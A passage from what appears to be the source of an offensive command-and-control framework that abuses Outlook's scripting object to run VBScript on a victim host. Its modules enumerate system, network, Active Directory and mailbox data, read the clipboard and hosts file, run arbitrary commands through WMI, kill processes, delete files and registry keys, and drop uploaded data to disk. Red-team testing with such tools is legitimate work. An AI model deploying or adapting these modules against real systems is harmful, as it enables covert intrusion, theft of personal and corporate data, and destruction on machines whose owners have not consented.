2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | If fs.FileExists({{file}}) = True Then 5 | fs.DeleteFile {{file}} 6 | End If 7 | 8 | If fs.FileExists({{file}}) = True Then 9 | delete_file = delete_file & "Delete file: " & {{file}} & " - Fail" 10 | else 11 | delete_file = delete_file & "Delete file: " & {{file}} & " - Success!" 
12 | End If 13 | End Function -------------------------------------------------------------------------------- /lib/handlers/dev_blank.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Outlook 7 | 12 | 13 | 14 | 15 | 16 | 17 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_officearch.txt: -------------------------------------------------------------------------------- 1 | Function list_officearch() 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\outlook.exe", "Path", strPath 6 | if InStr(strPath, "x86") > 0 Then 7 | list_officearch = "x86" 8 | else 9 | list_officearch = "x64" 10 | end if 11 | End Function 12 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_hostsfile.txt: -------------------------------------------------------------------------------- 1 | Function list_hostsfile() 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | If fs.FileExists("C:\Windows\System32\drivers\etc\hosts") = True Then 5 | set ReadFile = fs.OpenTextFile("C:\Windows\System32\drivers\etc\hosts", 1) 6 | content = ReadFile.ReadAll 7 | else 8 | content = "Hosts file not found - WTF!" 
9 | End If 10 | list_hostsfile = "C:\Windows\System32\drivers\etc\hosts:" & vbCrLf & content 11 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_windowsarch.txt: -------------------------------------------------------------------------------- 1 | Function list_windowsarch() 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | objreg.GetStringValue 2147483650, "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", "PROCESSOR_ARCHITECTURE", strArch 6 | if strArch = "AMD64" Then 7 | list_windowsarch = "x64" 8 | else 9 | list_windowsarch = strArch 10 | end if 11 | End Function 12 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_printers.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from datetime import datetime 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Uses wscript.network to gather printer connections 10 | 11 | It uses Wscript.Network 12 | - EnumPrinterConnections 13 | """ 14 | self.entry = 'list_printers' 15 | self.depends = [] 16 | super().__init__(templatepath) 17 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_environmentvariables.txt: -------------------------------------------------------------------------------- 1 | Function list_environmentvariables() 2 | On error resume next 3 | list_environmentvariables = list_environmentvariables & GetAllRegValues("HKLM", "SYSTEM\CurrentControlSet\Control\Session Manager\Environment", 64, 2147483650) & vbCrLF & vbCrLF 4 | list_environmentvariables = 
list_environmentvariables & GetAllRegValues("HKCU", "Environment", 64, 2147483649) & vbCrLF & vbCrLF 5 | list_environmentvariables = list_environmentvariables & GetAllRegValues("HKCU", "Volatile Environment", 64, 2147483649) & vbCrLF 6 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_windowsversion.txt: -------------------------------------------------------------------------------- 1 | Function list_windowsversion() 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "ProductName", strProdName 6 | objreg.GetStringValue 2147483650, "SOFTWARE\Microsoft\Windows NT\CurrentVersion", "ReleaseId", strRelId 7 | list_windowsversion = strProdName & " - " & strRelId 8 | End Function 9 | -------------------------------------------------------------------------------- /functions/operation/outlook/stop_outlook.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This might come as a big shock, but this function stops Outlook. 10 | I know, it is mindblowing. 
11 | 12 | It uses OutlookApplication 13 | - Quit() 14 | """ 15 | self.entry = 'Stop_Outlook' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_clipboard.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from datetime import datetime 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Creates a html object and retrieved the content from the clipboard 10 | 11 | It uses htmlfile 12 | - ParentWindow.ClipboardData.GetData() 13 | """ 14 | self.entry = 'list_clipboard' 15 | self.depends = [] 16 | super().__init__(templatepath) 17 | -------------------------------------------------------------------------------- /functions/execute/host/wmi_execute.txt: -------------------------------------------------------------------------------- 1 | Function Execute_WMICommand() 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set objConfig = objService.Get("Win32_ProcessStartup").SpawnInstance_() 6 | Set objProcess = objService.Get("Win32_Process") 7 | objProcess.Create {{command}}, Null, objConfig, varProcessId 8 | Execute_WMICommand = "Command executed: " & {{command}} & vbCrLf & "Process id new process: " & varProcessId 9 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_hotfixes.txt: -------------------------------------------------------------------------------- 1 | Function list_hotfixes() 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = 
objLocator.ConnectServer(".", "root\cimv2") 5 | Set colItems = objWMIService.ExecQuery("Select * from Win32_QuickFixEngineering",,48) 6 | list_hotfixes = "HotFixID - Description - InstalledOn" & vbCrLf 7 | For Each objItem in colItems 8 | list_hotfixes = list_hotfixes & objItem.HotFixID & " - " & objItem.Description & " - " & objItem.InstalledOn & vbCrLf 9 | Next 10 | End Function -------------------------------------------------------------------------------- /lib/handlers/specapplication.py: -------------------------------------------------------------------------------- 1 | #we are not able to directly initialize RequestHandler objects for single time initilization actions 2 | #This RequestHandler objects can access anything in the application class via self.application 3 | #Therefore we do shared single initilization here 4 | #validated from top level 5 | import tornado.web 6 | 7 | class speculaApplication(tornado.web.Application): 8 | def __init__(self, helpers, handlers = None, default_host = None, transforms = None, **settings): 9 | self.helpers = helpers 10 | super().__init__(handlers, default_host, transforms, **settings) 11 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_mappeddrives.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the mapped drives on the host. 
10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - Query: Select Name,ProviderName from Win32_MappedLogicalDisk 14 | """ 15 | self.entry = 'list_mappeddrives' 16 | self.depends = [] 17 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/enumerate/host/list_services.txt: -------------------------------------------------------------------------------- 1 | Function list_services() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set col = objWMIService.ExecQuery ("Select * from Win32_Service") 6 | 7 | For Each objService in col 8 | services = services & vbCrLf & objService.Name & vbCrLf & " State:" & objService.State & vbCrLf & " Name: " & objService.StartName & vbCrLf & " BinPath:" & objService.PathName 9 | Next 10 | list_services = services 11 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_startmenu.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Lists the structure and items in the start menu. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - Query: Select Name from Win32_LogicalProgramGroupItem 14 | """ 15 | self.entry = 'list_startmenu' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | -------------------------------------------------------------------------------- /api/SpeculaApi/resource.h: -------------------------------------------------------------------------------- 1 | //{{NO_DEPENDENCIES}} 2 | // Microsoft Visual C++ generated include file. 
3 | // Used by SpeculaApi.rc 4 | // 5 | #define IDS_PROJNAME 100 6 | #define IDR_SPECULAAPI 101 7 | #define IDR_SEPCULA 106 8 | 9 | // Next default values for new objects 10 | // 11 | #ifdef APSTUDIO_INVOKED 12 | #ifndef APSTUDIO_READONLY_SYMBOLS 13 | #define _APS_NEXT_RESOURCE_VALUE 201 14 | #define _APS_NEXT_COMMAND_VALUE 32768 15 | #define _APS_NEXT_CONTROL_VALUE 201 16 | #define _APS_NEXT_SYMED_VALUE 107 17 | #endif 18 | #endif 19 | -------------------------------------------------------------------------------- /helperFunctions/Delregkey_hkcu.txt: -------------------------------------------------------------------------------- 1 | Function DelRegKey_HKCU(PathToKey) 2 | On Error Resume Next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objreg = objLocator.ConnectServer(".", "root\cimv2").Get("StdRegProv") 5 | 6 | objreg.EnumKey 2147483649, PathToKey, arrSubkeys 7 | If IsArray(arrSubkeys) Then 8 | For Each strSubkey In arrSubkeys 9 | DelRegKey_HKCU(PathToKey & "\" & strSubkey) 10 | Next 11 | End If 12 | objreg.DeleteKey 2147483649, PathToKey 13 | DelRegKey_HKCU = "Regkey : HKCU\\" & PathToKey & " Deleted recursive" 14 | End Function 15 | -------------------------------------------------------------------------------- /api/SpeculaApi/pch.h: -------------------------------------------------------------------------------- 1 | // pch.h: This is a precompiled header file. 2 | // Files listed below are compiled only once, improving build performance for future builds. 3 | // This also affects IntelliSense performance, including code completion and many code browsing features. 4 | // However, files listed here are ALL re-compiled if any one of them is updated between builds. 5 | // Do not add files here that you will be updating frequently as this negates the performance advantage. 
6 | 7 | #ifndef PCH_H 8 | #define PCH_H 9 | 10 | // add headers that you want to pre-compile here 11 | #include "framework.h" 12 | 13 | #endif //PCH_H 14 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_mappeddrives.txt: -------------------------------------------------------------------------------- 1 | Function list_mappeddrives() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set col = objWMIService.ExecQuery ("Select Name,ProviderName from Win32_MappedLogicalDisk") 6 | 7 | drives = "Letter - Provider" & vbCrLf 8 | For Each obj in col 9 | drives = drives & obj.Name & " - " & obj.ProviderName & vbCrLf 10 | Next 11 | list_mappeddrives = drives 12 | End Function -------------------------------------------------------------------------------- /functions/operation/file/create_shortcut.txt: -------------------------------------------------------------------------------- 1 | Function create_shortcut() 2 | On error resume next 3 | Set objShell = window.external.OutlookApplication.CreateObject("WScript.Shell") 4 | Set lnk = objShell.CreateShortcut({{file}}) 5 | lnk.TargetPath = {{targetpath}} 6 | lnk.Arguments = {{arguments}} 7 | lnk.Description = {{description}} 8 | lnk.HotKey = {{hotkey}} 9 | lnk.IconLocation = {{iconlocation}} 10 | lnk.WindowStyle = {{windowstyle_int}} 11 | lnk.WorkingDirectory = {{workingdirectory}} 12 | lnk.Save 13 | create_shortcut = "Shortcut created at " & {{file}} 14 | End Function -------------------------------------------------------------------------------- /functions/operation/file/delete_dir.txt: -------------------------------------------------------------------------------- 1 | Function delete_dir() 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | 5 | if 
fs.FolderExists({{directory}}) = True Then 6 | fs.DeleteFolder {{directory}}, True 7 | If fs.FolderExists({{directory}}) = False Then 8 | delete_dir = "Delete directory: " & {{directory}} & " - Success" 9 | else 10 | delete_dir = "Delete directory: " & {{directory}} & " - Failed" 11 | End If 12 | else 13 | delete_dir = {{directory}} & " - Directory not found" 14 | End if 15 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_scheduledtasks.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the scheduled tasks on the host. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(ROOT\Microsoft\Windows\TaskScheduler) 13 | - Query: SELECT * FROM MSFT_ScheduledTask 14 | """ 15 | self.entry = 'list_scheduledtasks' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_networkcardinfo.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates all the information from the network cards. 
10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - Query: SELECT * FROM Win32_NetworkAdapterConfiguration 14 | """ 15 | self.entry = 'list_networkcardinfo' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | -------------------------------------------------------------------------------- /functions/operation/network/nslookup.txt: -------------------------------------------------------------------------------- 1 | function nslookup() 2 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 3 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 4 | 5 | Set colPings = objWMIService.ExecQuery("SELECT * FROM Win32_PingStatus WHERE Address = '" & {{hostname}} & "'") 6 | 7 | For Each objPing in colPings 8 | If objPing.StatusCode = 0 Then 9 | nslookup = "Hostname: " & {{hostname}} & " = " & objPing.ProtocolAddress 10 | Else 11 | nslookup = "Failed to resolve: " & {{hostname}} 12 | End If 13 | Next 14 | end function -------------------------------------------------------------------------------- /hiddenFunctions/upload_file.txt: -------------------------------------------------------------------------------- 1 | Function upload_file() 2 | on error resume next 3 | Set fso = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | Const ForAppending = 8 5 | Set File = fso.OpenTextFile({{destination}}, ForAppending, True) 6 | If Err.Number <> 0 Then 7 | upload_file = "ERROR: " & Err.Description 8 | Err.Clear 9 | exit function 10 | End if 11 | data = {{data}} 12 | start = 1 13 | loopnumber = len(data)/2 14 | For i = 1 To loopnumber 15 | File.write chr("&H" & mid(data,start,2)) 16 | start = start + 2 17 | Next 18 | File.Close 19 | upload_file = "Chunk uploaded successfully" 20 | End Function -------------------------------------------------------------------------------- /functions/operation/file/copy_file.txt: 
-------------------------------------------------------------------------------- 1 | Function copy_file() 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | 5 | if fs.FileExists({{file}}) = True Then 6 | fs.CopyFile {{file}}, {{destination}} 7 | 8 | If fs.FileExists({{destination}}) = True Then 9 | copy_file = "Copy file: " & {{file}} & " to " & {{destination}} & " - Success" 10 | else 11 | copy_file = "Copy file: " & {{file}} & " to " & {{destination}} & " - Failed" 12 | End If 13 | else 14 | copy_file = {{file}} & " - File not found" 15 | End if 16 | End Function -------------------------------------------------------------------------------- /functions/enumerate/host/list_boottime.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates last boot time using WMI. 10 | It queries LastBootUpTime from Win32_OperatingSystem and converts it to a readable format. 
11 | 12 | It uses WbemScripting.SWbemLocator 13 | - Query: Select LastBootUpTime from Win32_OperatingSystem 14 | """ 15 | self.entry = 'list_boottime' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | -------------------------------------------------------------------------------- /functions/execute/host/wmi_killprocpid.txt: -------------------------------------------------------------------------------- 1 | Function KillProc_PID() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set col = objWMIService.ExecQuery ("Select Name,ProcessId,ParentProcessId from Win32_Process Where ProcessID = '" & {{pid}} & "'") 6 | 7 | procs = "Processname - PID - PPID" & vbCrLf 8 | For Each obj in col 9 | procs = procs & "Killed process: " & obj.Name & " - " & obj.ProcessId & " - " & obj.ParentProcessId & vbCrLf 10 | obj.Terminate() 11 | Next 12 | KillProc_PID = procs 13 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_computers.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates all computers from Active Directory. 
10 | It returns the sAMAccountName 11 | 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(\\root\\directory\\LDAP) 14 | - Query: SELECT DS_sAMAccountName FROM ds_computer 15 | """ 16 | self.entry = 'list_computers' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /functions/execute/host/wmi_killprocname.txt: -------------------------------------------------------------------------------- 1 | Function KillProc_Name() 2 | On error resume next 3 | Set objLocator = window.external.OutlookApplication.CreateObject("WbemScripting.SWbemLocator") 4 | Set objWMIService = objLocator.ConnectServer(".", "root\cimv2") 5 | Set col = objWMIService.ExecQuery ("Select Name,ProcessId,ParentProcessId from Win32_Process Where Name = '" & {{process}} & "'") 6 | 7 | procs = "Processname - PID - PPID" & vbCrLf 8 | For Each obj in col 9 | procs = procs & "Killed process: " & obj.Name & " - " & obj.ProcessId & " - " & obj.ParentProcessId & vbCrLf 10 | obj.Terminate() 11 | Next 12 | KillProc_Name = procs 13 | End Function -------------------------------------------------------------------------------- /functions/operation/outlook/read_contacts.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | class Spec(SpecModule): 4 | def __init__(self, templatepath, helpers): 5 | self.options = {} 6 | self.helpers = helpers 7 | self.help = """ 8 | This module allows you to read the contacts items. 9 | Distribution groups are not implemented yet. 
10 | 11 | It uses OutlookApplication 12 | - GetNameSpace("MAPI").GetDefaultFolder(10) 13 | - GetNameSpace("MAPI").GetDefaultFolder(10).items 14 | """ 15 | self.entry = 'read_contacts' 16 | self.depends = [] 17 | super().__init__(templatepath) -------------------------------------------------------------------------------- /lib/handlers/base.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | Outlook 6 | 14 | 23 | 24 | 25 | 26 | 27 | 28 | 29 | 30 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_ntdomaininfo.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates information about the domain the computer is joined to using WMI. 10 | Returns unknown if computer is in workgroup. 11 | 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(root\cimv2) 14 | - Query: Select * from Win32_NTDomain 15 | """ 16 | self.entry = 'list_ntdomaininfo' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_domaininfo.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates Top level information from the specified domain in the Domain option. 
10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(\\root\\directory\\LDAP) 13 | - Query: SELECT * FROM ds_domaindns 14 | """ 15 | self.entry = 'list_domaininfo' 16 | self.depends = [] 17 | 18 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/operation/file/copy_dir.txt: -------------------------------------------------------------------------------- 1 | Function copy_dir() 2 | On error resume next 3 | Set fs = window.external.OutlookApplication.CreateObject("Scripting.FileSystemObject") 4 | if fs.FolderExists({{destination}}) = True Then 5 | copy_dir = "Destination directory already exists - Failed" 6 | else 7 | fs.CopyFolder {{directory}}, {{destination}} 8 | if fs.FolderExists({{destination}}) = True Then 9 | copy_dir = "Copy directory: " & {{directory}} & " to " & {{destination}} & " - Success" 10 | else 11 | copy_dir = "Copy directory: " & {{directory}} & " to " & {{destination}} & " - Failed" 12 | End If 13 | End if 14 | End Function -------------------------------------------------------------------------------- /functions/enumerate/ldap/list_users.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | 5 | class Spec(SpecModule): 6 | def __init__(self, templatepath, helpers): 7 | self.options = {} 8 | self.helpers = helpers 9 | self.help = """ 10 | Enumerates all users from Active Directory. 
11 | It returns the sAMAccountName 12 | 13 | It uses WbemScripting.SWbemLocator 14 | - ConnectServer(\\root\\directory\\LDAP) 15 | - Query: SELECT DS_sAMAccountName FROM ds_user 16 | """ 17 | self.entry = 'list_users' 18 | self.depends = [] 19 | super().__init__(templatepath) -------------------------------------------------------------------------------- /functions/enumerate/host/list_hotfixes.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Using WMI it enumerates the installed hotfixes. 10 | The Win32_QuickFixEngineering is used (Same as the Powershell cmdlet get-hotfix) 11 | 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(root\cimv2) 14 | - Query: Select * from Win32_QuickFixEngineering 15 | """ 16 | self.entry = 'list_hotfixes' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_recyclebin.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | This module reads lists the content of the recycle bin 10 | for the current user. To download a file use get_file and 11 | use the long path in the output from this module. 
12 | 13 | It uses CreateObject("Shell.Application") 14 | """ 15 | self.entry = 'list_recyclebin' 16 | self.depends = [] 17 | super().__init__(templatepath) 18 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_installedpowershell.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the current installed PowerShell versions on the host using registry. 10 | 11 | It uses WbemScripting.SWbemLocator 12 | - ConnectServer(root\cimv2) 13 | - ConnectServer(root\cimv2).EnumKey 14 | - ConnectServer(root\cimv2).GetStringValue 15 | """ 16 | self.entry = 'list_installedpowershell' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /api/SpeculaApi/Sepcula.rgs: -------------------------------------------------------------------------------- 1 | HKCR 2 | { 3 | SpeculaApi.Specula.1 = s 'Specula class' 4 | { 5 | CLSID = s '{e8b55279-c6b4-48f3-8138-b727337c0236}' 6 | } 7 | SpeculaApi.Specula = s 'Specula class' 8 | { 9 | CurVer = s 'SpeculaApi.Specula.1' 10 | } 11 | NoRemove CLSID 12 | { 13 | ForceRemove {e8b55279-c6b4-48f3-8138-b727337c0236} = s 'Specula class' 14 | { 15 | ProgID = s 'SpeculaApi.Specula.1' 16 | VersionIndependentProgID = s 'SpeculaApi.Specula' 17 | ForceRemove Programmable 18 | InprocServer32 = s '%MODULE%' 19 | { 20 | val ThreadingModel = s 'Free' 21 | } 22 | TypeLib = s '{5be8ef76-6253-482a-926e-d1d877de3b63}' 23 | Version = s '1.0' 24 | } 25 | } 26 | } 27 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_localusers.py: -------------------------------------------------------------------------------- 1 | 
from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates the local users on the current host 10 | 11 | It uses CreateObject("Wscript.Shell") 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(root\cimv2) 14 | - Query: "SELECT * FROM Win32_UserAccount WHERE LocalAccount = True" 15 | """ 16 | self.entry = 'list_localusers' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_recentfiles.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates all shortcuts in the MY_RECENT_DOCUMENTS / RECENT_FILES 10 | Resolved all shortcuts to the items and lists them out 11 | 12 | It uses WScript.Shell 13 | - CreateShortcut 14 | 15 | It uses Shell.Application 16 | - Namespace 17 | - Namespace().items 18 | """ 19 | self.entry = 'list_recentfiles' 20 | self.depends = [] 21 | super().__init__(templatepath) 22 | -------------------------------------------------------------------------------- /lib/modhandlers/generic.py: -------------------------------------------------------------------------------- 1 | from lib.core import helpers 2 | def quotedstring(value, **kwargs): 3 | if value[0] != "\"": 4 | return '"{}"'.format(value) 5 | return value 6 | 7 | def escapebackslash(value, **kwargs): 8 | if "\\" in value: 9 | return value.replace("\\", "\\\\") 10 | return value 11 | 12 | def makeint(value, **kwargs): 13 | return int(value) 14 | 15 | def makelist(value, **kwargs): 16 | args = helpers.Helpers.getarguments(value) 17 | 
return args 18 | 19 | def escapequotes(value, **kwargs): 20 | return value.replace('"', '""').replace("\\", "\\\\") 21 | 22 | def makebool(value, **kwargs): 23 | if value.lower() == 'true': 24 | return True 25 | else: 26 | return False -------------------------------------------------------------------------------- /functions/enumerate/host/list_recentfiles.txt: -------------------------------------------------------------------------------- 1 | Function list_recentfiles() 2 | On error resume next 3 | Const MY_RECENT_DOCUMENTS = &H8& 4 | recentpaths = "RECENT PATHS:" & vbCrLf 5 | set WshShell = window.external.OutlookApplication.CreateObject("WScript.Shell") 6 | Set objShell = window.external.OutlookApplication.CreateObject("Shell.Application") 7 | Set objFolder = objShell.Namespace(MY_RECENT_DOCUMENTS) 8 | Set colItems = objFolder.Items 9 | For Each objItem in colItems 10 | Set oShellLink = WshShell.CreateShortcut(objItem.path) 11 | if Len(oShellLink.TargetPath) = 0 then 12 | else 13 | recentpaths = recentpaths & oShellLink.TargetPath & vbCrLf 14 | end if 15 | Next 16 | list_recentfiles = recentpaths 17 | End Function -------------------------------------------------------------------------------- /Taskbooks/example.py: -------------------------------------------------------------------------------- 1 | def TaskBook(helpers, agent): 2 | mod = helpers.get_module('enumerate/host/list_applocker') # this doesn't take arguments, so we aren't giving it any 3 | helpers.insertTask(agent, mod, 'enumerate/host/list_applocker') 4 | mod = helpers.get_module('execute/host/cmd') # this does take an argument so we need to populate it 5 | helpers.setModOption(mod, 'command', prompt="What command would you like to run: ") 6 | helpers.insertTask(agent, mod, 'execute/host/cmd') 7 | #we don't have to prompt for the input though 8 | mod = helpers.get_module('operation/file/listdir') 9 | helpers.setModOption(mod, 'strpath', optval="C:\Windows") 10 | helpers.insertTask(agent, mod, 
'operation/file/listdir') 11 | 12 | 13 | 14 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_networklogon.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | 3 | 4 | class Spec(SpecModule): 5 | def __init__(self, templatepath, helpers): 6 | self.options = {} 7 | self.helpers = helpers 8 | self.help = """ 9 | Enumerates all the information from the Network login profile. 10 | Contains interesting information such as logon restrictions, logon scripts, number of logons and password age 11 | 12 | It uses WbemScripting.SWbemLocator 13 | - ConnectServer(root\cimv2) 14 | - Query: SELECT * FROM Win32_NetworkLoginProfile 15 | """ 16 | self.entry = 'list_networklogon' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /functions/operation/outlook/get_emailaddress.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 2 | from lib.modhandlers.generic import quotedstring,makeint,makebool 3 | from lib.validators.generic import ischoice 4 | from lib.tab_completers.generic import tab_choice 5 | 6 | class Spec(SpecModule): 7 | def __init__(self, templatepath, helpers): 8 | self.options = {} 9 | self.helpers = helpers 10 | self.help = """ 11 | Gets the current users email address based of the top level folder name in Outlook 12 | 13 | It uses OutlookApplication 14 | - GetNameSpace("MAPI").Folders(1).Folderpath 15 | """ 16 | self.entry = 'get_emailaddress' 17 | self.depends = [] 18 | super().__init__(templatepath) 19 | -------------------------------------------------------------------------------- /functions/enumerate/host/list_hostsfile.py: -------------------------------------------------------------------------------- 1 | from lib.core.specmodule import SpecModule 
